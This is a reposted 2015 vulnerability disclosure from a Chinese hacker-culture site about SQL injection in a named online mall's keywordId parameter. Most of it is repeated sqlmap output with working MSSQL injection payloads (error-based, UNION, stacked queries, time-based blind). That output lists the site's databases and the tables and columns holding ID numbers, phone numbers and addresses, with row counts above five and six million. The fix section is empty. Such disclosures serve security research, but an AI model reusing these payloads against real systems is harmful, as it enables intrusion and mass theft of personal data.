记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

某商城存在注入可获取500w+用户信息和600w+商户信息

2015-07-10 07:50

code 区域
GET /knowledgelist.aspx?keywordId=1&newstypeId=&productId=642 HTTP/1.1

X-Requested-With: XMLHttpRequest

Referer: http://www.1mutian.com:80/

Cookie: ASP.NET_SessionId=njtdkt1ldnmtapglbxntnrar; BrowedProductList-Admin=%3c%3fxml+version%3d%221.0%22+encoding%3d%22utf-16%22%3f%3e%0d%0a%3cArrayOfInt+xmlns%3axsi%3d%22http%3a%2f%2fwww.w3.org%2f2001%2fXMLSchema-instance%22+xmlns%3axsd%3d%22http%3a%2f%2fwww.w3.org%2f2001%2fXMLSchema%22%3e%0d%0a++%3cint%3e686%3c%2fint%3e%0d%0a++%3cint%3e1878%3c%2fint%3e%0d%0a++%3cint%3e1859%3c%2fint%3e%0d%0a++%3cint%3e1427%3c%2fint%3e%0d%0a++%3cint%3e1411%3c%2fint%3e%0d%0a++%3cint%3e438%3c%2fint%3e%0d%0a++%3cint%3e396%3c%2fint%3e%0d%0a++%3cint%3e790%3c%2fint%3e%0d%0a++%3cint%3e1861%3c%2fint%3e%0d%0a++%3cint%3e1660%3c%2fint%3e%0d%0a++%3cint%3e1674%3c%2fint%3e%0d%0a%3c%2fArrayOfInt%3e; CheckCode=DHJ8J; 1=1

Host: www.1mutian.com

Connection: Keep-alive

Accept-Encoding: gzip,deflate

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36

Accept: */*

漏洞证明:

code 区域
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Parameter: keywordId (GET)

Type: error-based

Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause

Payload: keywordId=1' AND 7323=CONVERT(INT,(SELECT CHAR(113)+CHAR(103)+CHAR(112)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (7323=7323) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(110)+CHAR(101)+CHAR(103)+CHAR(113))) AND 'FTtm'='FTtm&newstypeId=&productId=642



Type: UNION query

Title: Generic UNION query (NULL) - 1 column

Payload: keywordId=-7874' UNION ALL SELECT CHAR(113)+CHAR(103)+CHAR(112)+CHAR(122)+CHAR(113)+CHAR(98)+CHAR(121)+CHAR(89)+CHAR(73)+CHAR(108)+CHAR(85)+CHAR(110)+CHAR(108)+CHAR(87)+CHAR(97)+CHAR(113)+CHAR(110)+CHAR(101)+CHAR(103)+CHAR(113)-- &newstypeId=&productId=642



Type: stacked queries

Title: Microsoft SQL Server/Sybase stacked queries

Payload: keywordId=1'; WAITFOR DELAY '0:0:5'--&newstypeId=&productId=642



Type: AND/OR time-based blind

Title: Microsoft SQL Server/Sybase time-based blind

Payload: keywordId=1' WAITFOR DELAY '0:0:5'--&newstypeId=&productId=642

---

web server operating system: Windows 2008 or Vista

web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.0

back-end DBMS: Microsoft SQL Server 2008

current user: 'ymt'

current database: 'YMTTransDb'

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Parameter: keywordId (GET)

Type: error-based

Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause

Payload: keywordId=1' AND 7323=CONVERT(INT,(SELECT CHAR(113)+CHAR(103)+CHAR(112)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (7323=7323) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(110)+CHAR(101)+CHAR(103)+CHAR(113))) AND 'FTtm'='FTtm&newstypeId=&productId=642



Type: UNION query

Title: Generic UNION query (NULL) - 1 column

Payload: keywordId=-7874' UNION ALL SELECT CHAR(113)+CHAR(103)+CHAR(112)+CHAR(122)+CHAR(113)+CHAR(98)+CHAR(121)+CHAR(89)+CHAR(73)+CHAR(108)+CHAR(85)+CHAR(110)+CHAR(108)+CHAR(87)+CHAR(97)+CHAR(113)+CHAR(110)+CHAR(101)+CHAR(103)+CHAR(113)-- &newstypeId=&productId=642



Type: stacked queries

Title: Microsoft SQL Server/Sybase stacked queries

Payload: keywordId=1'; WAITFOR DELAY '0:0:5'--&newstypeId=&productId=642



Type: AND/OR time-based blind

Title: Microsoft SQL Server/Sybase time-based blind

Payload: keywordId=1' WAITFOR DELAY '0:0:5'--&newstypeId=&productId=642

---

web server operating system: Windows 2008 or Vista

web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.0

back-end DBMS: Microsoft SQL Server 2008

available databases [10]:

[*] CustomerUser

[*] master

[*] MobileSymbol

[*] model

[*] msdb

[*] ReportServer

[*] ReportServerTempDB

[*] tempdb

[*] YMTShopDate

[*] YMTTransDb



sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Parameter: keywordId (GET)

Type: error-based

Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause

Payload: keywordId=1' AND 7323=CONVERT(INT,(SELECT CHAR(113)+CHAR(103)+CHAR(112)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (7323=7323) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(110)+CHAR(101)+CHAR(103)+CHAR(113))) AND 'FTtm'='FTtm&newstypeId=&productId=642



Type: UNION query

Title: Generic UNION query (NULL) - 1 column

Payload: keywordId=-7874' UNION ALL SELECT CHAR(113)+CHAR(103)+CHAR(112)+CHAR(122)+CHAR(113)+CHAR(98)+CHAR(121)+CHAR(89)+CHAR(73)+CHAR(108)+CHAR(85)+CHAR(110)+CHAR(108)+CHAR(87)+CHAR(97)+CHAR(113)+CHAR(110)+CHAR(101)+CHAR(103)+CHAR(113)-- &newstypeId=&productId=642



Type: stacked queries

Title: Microsoft SQL Server/Sybase stacked queries

Payload: keywordId=1'; WAITFOR DELAY '0:0:5'--&newstypeId=&productId=642



Type: AND/OR time-based blind

Title: Microsoft SQL Server/Sybase time-based blind

Payload: keywordId=1' WAITFOR DELAY '0:0:5'--&newstypeId=&productId=642

---

web server operating system: Windows 2008 or Vista

web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.0

back-end DBMS: Microsoft SQL Server 2008

Database: CustomerUser

[3 tables]

+---------------------+

| CustomerInformation |

| T_DeletePhone |

| 私人营业库 |

+---------------------+



sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Parameter: keywordId (GET)

Type: error-based

Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause

Payload: keywordId=1' AND 7323=CONVERT(INT,(SELECT CHAR(113)+CHAR(103)+CHAR(112)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (7323=7323) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(110)+CHAR(101)+CHAR(103)+CHAR(113))) AND 'FTtm'='FTtm&newstypeId=&productId=642



Type: UNION query

Title: Generic UNION query (NULL) - 1 column

Payload: keywordId=-7874' UNION ALL SELECT CHAR(113)+CHAR(103)+CHAR(112)+CHAR(122)+CHAR(113)+CHAR(98)+CHAR(121)+CHAR(89)+CHAR(73)+CHAR(108)+CHAR(85)+CHAR(110)+CHAR(108)+CHAR(87)+CHAR(97)+CHAR(113)+CHAR(110)+CHAR(101)+CHAR(103)+CHAR(113)-- &newstypeId=&productId=642



Type: stacked queries

Title: Microsoft SQL Server/Sybase stacked queries

Payload: keywordId=1'; WAITFOR DELAY '0:0:5'--&newstypeId=&productId=642



Type: AND/OR time-based blind

Title: Microsoft SQL Server/Sybase time-based blind

Payload: keywordId=1' WAITFOR DELAY '0:0:5'--&newstypeId=&productId=642

---

web server operating system: Windows 2008 or Vista

web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.0

back-end DBMS: Microsoft SQL Server 2008

Database: CustomerUser

Table: CustomerInformation

[15 columns]

+--------+----------+

| Column | Type |

+--------+----------+

| id | int |

| mobile | varchar |

| 使用人 | nvarchar |

| 出生日期 | nvarchar |

| 初次登记日期 | datetime |

| 卡型 | nvarchar |

| 名字 | nvarchar |

| 地址 | nvarchar |

| 套餐更改日期 | datetime |

| 性别 | nvarchar |

| 手机 | float |

| 有效日期 | datetime |

| 证件号码 | nvarchar |

| 话费 | nvarchar |

| 邮编 | nvarchar |

+--------+----------+



sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Parameter: keywordId (GET)

Type: error-based

Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause

Payload: keywordId=1' AND 7323=CONVERT(INT,(SELECT CHAR(113)+CHAR(103)+CHAR(112)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (7323=7323) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(110)+CHAR(101)+CHAR(103)+CHAR(113))) AND 'FTtm'='FTtm&newstypeId=&productId=642



Type: UNION query

Title: Generic UNION query (NULL) - 1 column

Payload: keywordId=-7874' UNION ALL SELECT CHAR(113)+CHAR(103)+CHAR(112)+CHAR(122)+CHAR(113)+CHAR(98)+CHAR(121)+CHAR(89)+CHAR(73)+CHAR(108)+CHAR(85)+CHAR(110)+CHAR(108)+CHAR(87)+CHAR(97)+CHAR(113)+CHAR(110)+CHAR(101)+CHAR(103)+CHAR(113)-- &newstypeId=&productId=642



Type: stacked queries

Title: Microsoft SQL Server/Sybase stacked queries

Payload: keywordId=1'; WAITFOR DELAY '0:0:5'--&newstypeId=&productId=642



Type: AND/OR time-based blind

Title: Microsoft SQL Server/Sybase time-based blind

Payload: keywordId=1' WAITFOR DELAY '0:0:5'--&newstypeId=&productId=642

---

web server operating system: Windows 2008 or Vista

web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.0

back-end DBMS: Microsoft SQL Server 2008

Database: CustomerUser

+-------------------------+---------+

| Table | Entries |

+-------------------------+---------+

| dbo.CustomerInformation | 5294405 |

+-------------------------+---------+



sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Parameter: keywordId (GET)

Type: error-based

Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause

Payload: keywordId=1' AND 7323=CONVERT(INT,(SELECT CHAR(113)+CHAR(103)+CHAR(112)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (7323=7323) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(110)+CHAR(101)+CHAR(103)+CHAR(113))) AND 'FTtm'='FTtm&newstypeId=&productId=642



Type: UNION query

Title: Generic UNION query (NULL) - 1 column

Payload: keywordId=-7874' UNION ALL SELECT CHAR(113)+CHAR(103)+CHAR(112)+CHAR(122)+CHAR(113)+CHAR(98)+CHAR(121)+CHAR(89)+CHAR(73)+CHAR(108)+CHAR(85)+CHAR(110)+CHAR(108)+CHAR(87)+CHAR(97)+CHAR(113)+CHAR(110)+CHAR(101)+CHAR(103)+CHAR(113)-- &newstypeId=&productId=642



Type: stacked queries

Title: Microsoft SQL Server/Sybase stacked queries

Payload: keywordId=1'; WAITFOR DELAY '0:0:5'--&newstypeId=&productId=642



Type: AND/OR time-based blind

Title: Microsoft SQL Server/Sybase time-based blind

Payload: keywordId=1' WAITFOR DELAY '0:0:5'--&newstypeId=&productId=642

---

web server operating system: Windows 2008 or Vista

web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.0

back-end DBMS: Microsoft SQL Server 2008

Database: CustomerUser

+-------+---------+

| Table | Entries |

+-------+---------+

| dbo.私人营业库 | 6847309 |

+-------+---------+



sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Parameter: keywordId (GET)

Type: error-based

Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause

Payload: keywordId=1' AND 7323=CONVERT(INT,(SELECT CHAR(113)+CHAR(103)+CHAR(112)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (7323=7323) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(110)+CHAR(101)+CHAR(103)+CHAR(113))) AND 'FTtm'='FTtm&newstypeId=&productId=642



Type: UNION query

Title: Generic UNION query (NULL) - 1 column

Payload: keywordId=-7874' UNION ALL SELECT CHAR(113)+CHAR(103)+CHAR(112)+CHAR(122)+CHAR(113)+CHAR(98)+CHAR(121)+CHAR(89)+CHAR(73)+CHAR(108)+CHAR(85)+CHAR(110)+CHAR(108)+CHAR(87)+CHAR(97)+CHAR(113)+CHAR(110)+CHAR(101)+CHAR(103)+CHAR(113)-- &newstypeId=&productId=642



Type: stacked queries

Title: Microsoft SQL Server/Sybase stacked queries

Payload: keywordId=1'; WAITFOR DELAY '0:0:5'--&newstypeId=&productId=642



Type: AND/OR time-based blind

Title: Microsoft SQL Server/Sybase time-based blind

Payload: keywordId=1' WAITFOR DELAY '0:0:5'--&newstypeId=&productId=642

---

web server operating system: Windows 2008 or Vista

web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.0

back-end DBMS: Microsoft SQL Server 2008

Database: CustomerUser

Table: 私人营业库

[4 columns]

+----------+----------+

| Column | Type |

+----------+----------+

| Address | nvarchar |

| MailNo | nvarchar |

| TelPhone | nvarchar |

| Username | nvarchar |

+----------+----------+





数据我就不跑了吧。

修复方案:

你们懂的

知识来源: www.wooyun.org/bugs/wooyun-2015-0116138

阅读:89736 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“某商城存在注入可获取500w+用户信息和600w+商户信息”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云

本页关键词